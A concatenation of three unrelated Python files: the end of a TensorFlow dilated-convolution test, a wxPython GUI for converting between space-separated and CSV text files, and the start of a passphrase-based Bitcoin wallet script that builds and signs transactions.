input=converted_input, filter=f1, padding=padding)
result = nn_ops.convolution(
input=result, filter=f2, padding=padding)
# pylint: enable=cell-var-from-loop
return result
for rate_height in range(2, 4):
for rate_width in range(2, 4):
dilation_rate = [rate_height, rate_width]
y1 = nn_ops.convolution(
input=x,
filter=f1,
padding=padding,
dilation_rate=dilation_rate)
y1 = nn_ops.convolution(
input=y1,
filter=f2,
padding=padding,
dilation_rate=dilation_rate)
y2 = nn_ops.with_space_to_batch(
input=x,
dilation_rate=dilation_rate,
op=combined_op,
padding="VALID")
def check(y1_eval, y2_eval):
self.assertAllClose(y1_eval, y2_eval, rtol=1e-2, atol=1e-2)
add_check(check, y1, y2)
def _test_gradient(self, x_shape, f_shape, dilation_rate, padding):
x_val = np.random.random_sample(x_shape).astype(np.float32)
f_val = np.random.random_sample(f_shape).astype(np.float32)
x = constant_op.constant(x_val, name="x", dtype=dtypes.float32)
f = constant_op.constant(f_val, name="f", dtype=dtypes.float32)
output = nn_ops.convolution(
input=x, filter=f, dilation_rate=dilation_rate, padding=padding)
y_shape = output.get_shape().as_list()
err = gradient_checker.compute_gradient_error([x, f], [x_shape, f_shape],
output, y_shape)
err_tolerance = 1e-2
self.assertLess(err, err_tolerance)
@test_util.run_v1_only("b/120545219")
def testGradient(self):
with self.cached_session():
for padding in ["SAME", "VALID"]:
for rate_width in range(1, 3):
for rate_height in range(1, 3):
self._test_gradient(
x_shape=[2, 5, 6, 2],
f_shape=[3, 3, 2, 2],
dilation_rate=[rate_height, rate_width],
padding=padding)
if __name__ == "__main__":
test.main()
|
|
import wx
import os #needed to join paths in open/save
import threading
import copy
class mainwindow(wx.Frame):
def __init__(self, parent, title):
self.input = ['', '', '', '', '', ''] #Save user entered values
self.dirname = ''
self.filename = ''
#Creating the window, setting it blue, and adding a text box to it
wx.Frame.__init__(self, parent, title = title, size =(1000, 800))
self.SetBackgroundColour((120, 180, 255)) #light blue
self.logger = wx.TextCtrl(self, size=(300, 150),style=wx.TE_MULTILINE|\
wx.TE_RICH)
self.CreateStatusBar()
self.Bind(wx.EVT_CLOSE, self.OnExit) #bind x button
self.is_header = False
self.copy_header = False
self.is_csv = False
self.want_csv = False
self.smart_check = False
#Setting up the "File" menu option
filemenu = wx.Menu()
menuOpen = filemenu.Append(wx.ID_OPEN, "&Open", \
"Open a Text File of Points to Interpolate")
menuSave = filemenu.Append(wx.ID_SAVE, \
"&Save", "Select a Text File for Output")
menuAbout = filemenu.Append(wx.ID_ABOUT, "&About", \
"Information About the Program")
filemenu.AppendSeparator()
menuExit = filemenu.Append(wx.ID_EXIT,"&Exit","Terminate the Program")
self.Bind(wx.EVT_MENU, self.OnOpen, menuOpen)
self.Bind(wx.EVT_MENU, self.OnSave, menuSave)
self.Bind(wx.EVT_MENU, self.OnAbout, menuAbout)
self.Bind(wx.EVT_MENU, self.OnExit, menuExit)
#Setting up the "Help" menu option
helpmenu = wx.Menu()
self.menuHelp = helpmenu.Append(wx.ID_HELP, "&Help", \
"Help on Using the Program")
self.Bind(wx.EVT_MENU, self.OnHelp, self.menuHelp)
#Creating File MenuBar
menubar = wx.MenuBar()
menubar.Append(filemenu, "&File")
menubar.Append(helpmenu, "&Help")
self.SetMenuBar(menubar)
#Create Sizers
mainSizer = wx.BoxSizer(wx.VERTICAL)
grid = wx.GridBagSizer(hgap=7, vgap=3)
hSizer = wx.BoxSizer(wx.HORIZONTAL)
#Input File Box
self.input_text = wx.StaticText(self, label = "Input File Name:")
self.input_box = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.input_text, pos = (0, 0))
grid.Add(self.input_box, pos = (1, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 0), \
self.input_box)
self.make_bold(self.input_text)
self.make_bold(self.input_box)
#Browse Button Points
self.browse_button_input = wx.Button(self, label = "Browse..")
self.Bind(wx.EVT_BUTTON, self.OnOpen, self.browse_button_input)
self.make_bold(self.browse_button_input)
grid.Add(self.browse_button_input, pos = (2, 0))
#Output File Box
self.output_text = wx.StaticText(self, label = "Output File Name:")
self.output_box = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.output_text, pos = (0, 1))
grid.Add(self.output_box, pos = (1, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 1), \
self.output_box)
self.make_bold(self.output_text)
self.make_bold(self.output_box)
#Browse Button Output
self.browse_button_out = wx.Button(self, label = "Browse..")
self.Bind(wx.EVT_BUTTON, self.OnSave, self.browse_button_out)
self.make_bold(self.browse_button_out)
grid.Add(self.browse_button_out, pos = (2, 1))
#Number of Lines
self.num_lines_prompt = wx.StaticText(\
self,label="Number of lines: ")
self.num_lines = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.num_lines_prompt, pos = (3, 0))
grid.Add(self.num_lines, pos = (4, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 4), self.num_lines)
self.make_bold(self.num_lines)
self.make_bold(self.num_lines_prompt)
#Filter
self.filter_prompt = wx.StaticText(\
self,label="Filter: ")
self.filter = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.filter_prompt, pos = (3, 1))
grid.Add(self.filter, pos = (4, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 5), self.filter)
self.make_bold(self.filter_prompt)
self.make_bold(self.filter)
#Input format
self.in_format_prompt = wx.StaticText(self,label="Input File Format: ")
self.in_format = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.in_format_prompt, pos = (5, 0))
grid.Add(self.in_format, pos = (6, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 2), self.in_format)
self.make_bold(self.in_format_prompt)
#Output Format
self.out_format_prompt= wx.StaticText(self,label="Output File Format: ")
self.out_format = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.out_format_prompt, pos = (5, 1))
grid.Add(self.out_format, pos = (6, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 3), self.out_format)
self.make_bold(self.out_format_prompt)
#Create Checkbox
self.header_check = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Has Header")
grid.Add(self.header_check, pos = (7, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckHead, self.header_check)
self.header_check_lbl = wx.StaticText(self, label =\
(" "\
+ " Has Header"))
grid.Add(self.header_check_lbl, pos=(7, 0))
self.make_bold(self.header_check_lbl)
#Create Checkbox
self.header_copy = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Copy Header")
grid.Add(self.header_copy, pos = (8, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckCopy, self.header_copy)
self.header_copy_lbl = wx.StaticText(self, label =\
(" " +\
" Copy Header"))
grid.Add(self.header_copy_lbl, pos=(8, 0))
self.make_bold(self.header_copy_lbl)
self.header_copy.Enable(False)
#Create Checkbox
self.in_is_csv = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Input File CSV")
grid.Add(self.in_is_csv, pos = (9, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckCSV, self.in_is_csv)
self.in_is_csv_lbl = wx.StaticText(self, label =\
(" " +\
" Input is CSV File"))
grid.Add(self.in_is_csv_lbl, pos=(9, 0))
self.make_bold(self.in_is_csv_lbl)
#Create Checkbox
self.out_is_csv = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Output File CSV")
grid.Add(self.out_is_csv, pos = (10, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckOut, self.out_is_csv)
self.out_is_csv_lbl = wx.StaticText(self, label =\
(" " +\
" Output is CSV File"))
grid.Add(self.out_is_csv_lbl, pos=(10, 0))
self.make_bold(self.out_is_csv_lbl)
if self.smart_check:
self.out_is_csv.Enable(False)
#Smart Checkbox
create_smartcheck = filemenu.Append(wx.ID_ANY, "Smart&Check", "SmartCheck", wx.ITEM_CHECK)
self.Bind(wx.EVT_MENU, self.OnSmartCheck, create_smartcheck)
#Convert Button
self.convert_button = wx.Button(self, label="Convert")
self.Bind(wx.EVT_BUTTON, self.OnClick, self.convert_button)
self.make_bold(self.convert_button)
#Clear Button
self.clear_button = wx.Button(self, label = "Clear")
self.Bind(wx.EVT_BUTTON, self.Clear, self.clear_button)
self.make_bold(self.clear_button)
#Setup sizers and place them
hSizer.AddSpacer(10)
hSizer.Add(grid, 0, wx.EXPAND, 10)
hSizer.AddSpacer(10)
hSizer.Add(self.logger, 1, wx.EXPAND)
mainSizer.AddSpacer(10)
mainSizer.Add(hSizer, 1,wx.EXPAND)
mainSizer.AddSpacer(10)
mainSizer.Add(self.convert_button, 0, wx.EXPAND | wx.CENTER)
mainSizer.AddSpacer(5)
buttonSizer = wx.BoxSizer(wx.HORIZONTAL)
buttonSizer.Add(self.clear_button, 1, wx.LEFT)
mainSizer.Add(buttonSizer, 0)
self.SetSizerAndFit(mainSizer)
self.Centre()
def OnAbout(self, e):
'''Displays a pupup box that gives information about this software'''
dlg = wx.MessageDialog(self, "Convert Text File Software " + \
"\n\nThis Graphical-" +\
"User-Interface for converting between " +\
"Space separated and comma separated text files"\
+ " was created by" +\
" Cameron Buttazzoni for research " + \
"purposes at the Fires Management " +\
"System Laboratory in the Faculty of Forestry"+\
" at the University of Toronto\n\n" +\
"THIS SOFTWARE IS NOT VALIDATED OR CERTIFIED" +\
" FOR OPERATIONAL USE"\
+ "\nCopyright: Cameron Buttazzoni\n\n", \
"About Convert Text Files Software", wx.OK)
dlg.ShowModal()
dlg.Destroy()
def OnExit(self, e):
'''Exit the software'''
self.Close(True)
raise SystemExit
def OnSave(self, e): #Same functionality as browse output file
'''Select an output file'''
dlg = wx.FileDialog(self, "Choose a file", self.dirname, \
"", "*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
self.input[1] = os.path.join(self.dirname, self.filename)
self.output_box.SetValue(os.path.join(self.dirname, self.filename))
dlg.Destroy()
def OnOpen(self, e): #same functionality as browse input file
'''Open an input file'''
dlg = wx.FileDialog(self, "Choose a file", self.dirname, \
"", "*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
self.input[0] = os.path.join(self.dirname, self.filename)
self.input_box.SetValue(os.path.join(self.dirname, self.filename))
dlg.Destroy()
def OnHelp(self, e):
'''Opens a box displaying this on help'''
help_text = '''Input file should be a space seperated or csv file\n
For input format, leave it blank to copy all of the values from the input file\n
Instead, you can enter comma or space seperated numbers to choose from specific
input columns that you want to include.\nFor output format, the format is
the same, but this chooses the order the inputs will be placed in the output
file.\n Leave this field blank to copy all inputs.\n Numbers not entered will
be replaced by NULL for space seperated output files, and an empty string
for CVS output files.\n WARNING: Reordering the output DOES NOT reorder the
header if you select to copy it.\nSmartCheck Automatically converts to a
space seperated file if the input is CSV, and vice versa.\n
Number of lines copies up to that many lines (not counting the header if copied
\nTo use filter, enter the values as column number (starting from 1)::string\n
* can be included so to filter such that everything else must be in any string.
-- can be included at the start of a string to copy all but those ones.\n
Separate additional filters with a comma without a space: ex:\n
4::196*,3::--Type1'''
help_dlg = wx.MessageDialog(self, help_text, "File Conversion" +\
" Software Help", wx.OK)
help_dlg.ShowModal()
help_dlg.Destroy()
def EvtText(self, e, num):
'''Entering text sets input to new entered value'''
try:
value = e.GetString().encode('ascii', 'ignore')
except AttributeError:
pass
if num == 2: #input format
if value == '':
self.input[num] = ''
elif len(value.split(',')) != 1:
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
else:
temp_list = value.split()
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
elif num == 3: #output format
if value == '':
self.input[num] = ''
elif len(value.split(',')) != 1:
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
else:
temp_list = value.split()
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
elif num == 5:
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
temp_list[x] = temp_list[x].split('::')
temp_list[x][0] = int(temp_list[x][0])
if type(temp_list[x][1]) != str:
raise ValueError
except (ValueError, IndexError, TypeError):
pass
self.input[5] = temp_list
else:
self.input[num] = value
def Clear(self, e): #clears logger and all entered values
self.logger.Clear()
self.input_box.Clear()
self.output_box.Clear()
self.out_format.Clear()
self.in_format.Clear()
for x in range(len(self.input)):
self.input[x] = ''
def OnClick(self, e):
'''Convert'''
self.disable_buttons()
if self.input[2] == '':
copy_all_thread = threading.Thread(target = self.copy_all)
copy_all_thread.setDaemon(True)
copy_all_thread.start()
else:
copy_select_thread = threading.Thread(target = self.copy_select)
copy_select_thread.setDaemon(True)
copy_select_thread.start()
def copy_all(self):
#Copy Everything Over
try:
in_file = open(self.input[0], 'r')
except IOError:
self.logger.AppendText("\nInvalid Input File\n\n")
self.enable_buttons()
return
try:
out_file = open(self.input[1], 'w')
except IOError:
self.logger.AppendText("\nInvalid Output File\n\n")
self.enable_buttons()
return
temp = ''
if self.is_header:
temp = in_file.readline()
temp = in_file.readline()
if self.is_csv:
find_length_in = len(temp.split(','))
else:
find_length_in = len(temp.split())
try:
if max(self.input[2]) > find_length_in:
in_file.close()
out_file.close()
self.logger.AppendText("\nInput Format Value Too Large\n\n")
self.enable_buttons()
return
except ValueError:
pass
in_file.seek(0)
self.logger.AppendText("\nConverting...\n\n")
if self.is_header:
temp = in_file.readline()
if temp[-1] == '\n':
temp = temp[:-1]
if self.copy_header:
if self.is_csv:
temp2 = temp.split(',')
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
if self.input[3] == '':
count = 1
while temp != '':
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ',')
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
while temp != '':
for x in range(len(self.input[3])):
if type(self.input[3][x]) != int:
self.logger.AppendText("\nInvalid Output Format\n\n")
self.enable_buttons()
return
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = ["NULL"] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = temp2[x] #first spot is 1
except IndexError:
pass
for x in range(len(new_line)):
if not self.want_csv:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = [""] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = temp2[x] #first spot is 1
except IndexError:
pass
for x in range(len(new_line)):
if self.want_csv:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
else:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
def copy_select(self):
for x in range(len(self.input[2])):
if type(self.input[2][x]) != int:
self.logger.AppendText("\nInvalid Input Format\n\n")
self.enable_buttons()
return
try:
in_file = open(self.input[0], 'r')
except IOError:
self.logger.AppendText("\nInvalid Input File\n\n")
self.enable_buttons()
return
try:
out_file = open(self.input[1], 'w')
except IOError:
self.logger.AppendText("\nInvalid Output File\n\n")
self.enable_buttons()
return
temp = ''
if self.is_header:
temp = in_file.readline()
temp = in_file.readline()
if self.is_csv:
find_length_in = len(temp.split(','))
else:
find_length_in = len(temp.split())
try:
if max(self.input[2]) > find_length_in:
in_file.close()
out_file.close()
self.logger.AppendText("\nInput Format Value Too Large\n\n")
self.enable_buttons()
return
except ValueError:
pass
in_file.seek(0)
self.logger.AppendText("\nConverting...\n\n")
if self.is_header:
temp = in_file.readline()
if temp[-1] == '\n':
temp = temp[:-1]
if self.copy_header:
if self.is_csv:
temp2 = temp.split(',')
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
#Copy selected ones over
if self.input[3] == '':
while temp != '':
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(self.input[2])):
if not self.want_csv:
if temp2[self.input[2][x] - 1] != '':
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + " ")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if x != len(self.input[2]) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + ",")
else:
out_file.write(temp2[self.input[2][x] - 1])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(self.input[2])):
if self.want_csv:
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + ",")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if temp2[self.input[2][x] - 1] != '':
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + " ")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if x != len(self.input[2]) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
while temp != '':
for x in range(len(self.input[3])):
if type(self.input[3][x]) != int:
self.logger.AppendText("\nInvalid Output Format\n\n")
self.enable_buttons()
return
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = ["NULL"] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = \
temp2[self.input[2][x] - 1]
#first spot is 1
except IndexError:
try:
new_line.append(temp2[self.input[2][x] - 1])
except IndexError:
pass
for x in range(len(new_line)):
if not self.want_csv:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = [""] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = \
temp2[self.input[2][x] - 1]
#first spot is 1
except IndexError:
try:
new_line.append(temp2[self.input[2][x] - 1])
except IndexError:
pass
for x in range(len(new_line)):
if self.want_csv:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
else:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
def filter_line(self, line):
if self.input[5] == '':
return 1
for x in range(len(self.input[5])):
temp = copy.deepcopy(self.input[5])
try:
if '*' in temp[x][1] and '--' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "*")
temp[x][1] = temp[x][1].translate(None, "--")
if temp[x][1] in line[self.input[5][x][0]-1]:
return 0
elif '*' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "*")
if temp[x][1] not in line[self.input[5][x][0]-1]:
return 0
elif '%' in temp[x][1] and '--' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "--")
if len(temp[x][1]) == len(line[self.input[5][x][0]-1]):
flag = True
for y in range(len(temp[x][1])):
if temp[x][1][y] != line[self.input[5][x][0]-1][y]\
and temp[x][1][y] != '%':
flag = False
break
if flag:
return 0
elif '%' in temp[x][1]:
if len(temp[x][1]) != len(line[self.input[5][x][0]-1]):
return 0
for y in range(len(temp[x][1])):
if temp[x][1][y] != line[self.input[5][x][0]-1][y]\
and temp[x][1][y] != '%':
return 0
elif '--' == temp[x][1][:2]:
temp[x][1] = temp[x][1].translate(None, "--")
if line[self.input[5][x][0] - 1] == temp[x][1]:
return 0
else:
if line[self.input[5][x][0] - 1] != temp[x][1]:
return 0
except IndexError:
return -1
return 1
def make_bold(self, text):
'''Makes prompts and button text bold'''
temp_font = text.GetFont()
temp_font.SetWeight(wx.BOLD)
text.SetFont(temp_font)
def disable_buttons(self):
'''Prevent User from clicking any buttons'''
self.convert_button.Enable(False)
self.clear_button.Enable(False)
self.browse_button_out.Enable(False)
self.browse_button_input.Enable(False)
def enable_buttons(self):
'''Reenable buttons to be pressed'''
self.convert_button.Enable(True)
self.clear_button.Enable(True)
self.browse_button_out.Enable(True)
self.browse_button_input.Enable(True)
def OnCheckHead(self, e):
if self.is_header == False:
self.is_header = True
else:
self.is_header = False
if self.header_copy.IsEnabled():
self.header_copy.Enable(False)
else:
self.header_copy.Enable(True)
def OnCheckCopy(self, e):
if self.copy_header:
self.copy_header = False
else:
self.copy_header = True
def OnCheckCSV(self, e):
if self.is_csv:
self.is_csv = False
if self.smart_check:
self.want_csv = True
else:
self.is_csv = True
if self.smart_check:
self.want_csv = False
def OnCheckOut(self, e):
if self.want_csv:
self.want_csv = False
else:
self.want_csv = True
def OnSmartCheck(self, e):
if self.smart_check:
self.smart_check = False
self.out_is_csv.Enable(True)
else:
self.smart_check = True
self.out_is_csv.Enable(False)
#run the GUI
app = wx.App(False)
frame = mainwindow(None, "Fire Interpolation System")
frame.Show()
app.MainLoop()
|
|
from bitcoin import *
import getpass
import json
import random
import argparse
import time
import os.path
import binascii
import readline
import platform
from . import diceware
from .blockchain_providers import *
from .aes import AES
SATOSHIS = 100000000
BTCUSD_RATE = 0
BTCUSD_FETCHED = 0
PROVIDER = None
NO_FIAT = False
RECOMMENDED_FEE = 100 # in satoshis per byte
class Address:
def __init__(self, exp):
self.exp = exp
self.pub = privtopub(exp)
self.addr = pubtoaddr(self.pub)
self.priv = encode_privkey(exp, 'wif')
self.balance = None
self.n = -1
class TxData:
def __init__(self, tx, chg_idx):
self.outs = []
self.change = None
c_outs = deserialize(tx)['outs']
for i,o in enumerate(c_outs):
value = o['value']
address = script_to_address(o['script'])
output = (address, value)
if i != chg_idx:
self.outs.append(output)
else:
self.change = output
class Wallet:
def __init__(self, passphrase):
self.addresses = []
self.idx_map = {}
self.n = 0
self.passphrase = passphrase
def add(self, address):
self.addresses.append(address)
if address is not None: self.idx_map[address.addr] = self.n
address.n = self.n
self.n += 1
def add_many(self, addresses):
for a in addresses:
self.add(a)
def get(self, address_or_index):
idx = -1
if isinstance(address_or_index, int):
idx = address_or_index if 0 <= address_or_index < len(self.addresses) else -1
elif self.idx_map.has_key(address_or_index):
idx = self.idx_map[address_or_index]
if idx == -1:
raise AddrOutOfRangeEx()
return self.addresses[idx]
def get_unused_addr(self):
return next((c for c in self.addresses if c.balance is None), None)
def expand(self, i):
addresses = create_address_range(self.passphrase, self.n, self.n+i)
self.add_many(addresses)
return addresses
def update_balances(self, from_idx = 0):
global PROVIDER
batches=[]
batch_size = 15
batch = []
ind = 0
for i, a in enumerate(self.addresses):
if a is None or i < from_idx: continue
batch_ind = i / batch_size
if ind < batch_size:
batch.append(a.addr)
ind += 1
if ind == batch_size - 1 or i == self.n - 1:
batches.append(batch)
batch = []
ind = 0
for batch in batches:
addr_info = PROVIDER.get_address_info(batch)
for i,info in enumerate(addr_info):
if info[1] > 0:
addr = self.get(batch[i])
addr.balance = info[0]
def auto_init(self, auto_print = True):
gap_limit = 5
print_wallet_header()
while True:
update_from = len(self.addresses)
new_addrs = self.expand(10)
self.update_balances(update_from)
trailing_addrs = self.addresses[-gap_limit:]
n_unused = len([a for a in trailing_addrs if a.balance is None])
print_wallet_addresses(new_addrs, False)
if n_unused >= gap_limit:
break
print_wallet_footer(self)
class AddrOutOfRangeEx(Exception):
pass
def hex_string_to_int_array(hex_string):
result = []
for i in range(0, len(hex_string), 2):
result.append(int(hex_string[i:i+2], 16))
return result
def create_address_range(passphrase, start, end):
list = []
for i in range(start, end):
exp = sha256(passphrase + str(i))
list.append(Address(exp))
return list
def make_tx(address, to_address, change_address, amount, fee = None):
global PROVIDER
outs = []
ins = PROVIDER.get_utxo(address.addr)
balance = sum(i['value'] for i in ins)
if fee is None:
txsize = len(ins)*180 + 2*34 + 10 + len(ins)
fee = RECOMMENDED_FEE * txsize
change_amt = 0
if amount + fee >= balance:
amount = balance - fee
else:
change_amt = balance - amount - fee
if change_amt < 10000:
change_amt = 0
amount += change_amt
payment_out = {'value': amount, 'address': to_address}
change_out = {'value': change_amt, 'address': change_address}
# randomize the order of change and payment to increase privacy
outs.append(payment_out)
chg_idx = random.randint(0,1)
if change_amt > 0:
outs.insert(chg_idx, change_out)
else:
chg_idx = -1
tx = mktx(ins, outs)
for i in range(0, len(ins)):
tx = sign(tx, i, address.exp)
return (tx, chg_idx)
def validate_tx(wallet, tx, chg_idx, from_addr, chg_address_str):
print('')
tx_data = TxData(tx, chg_idx)
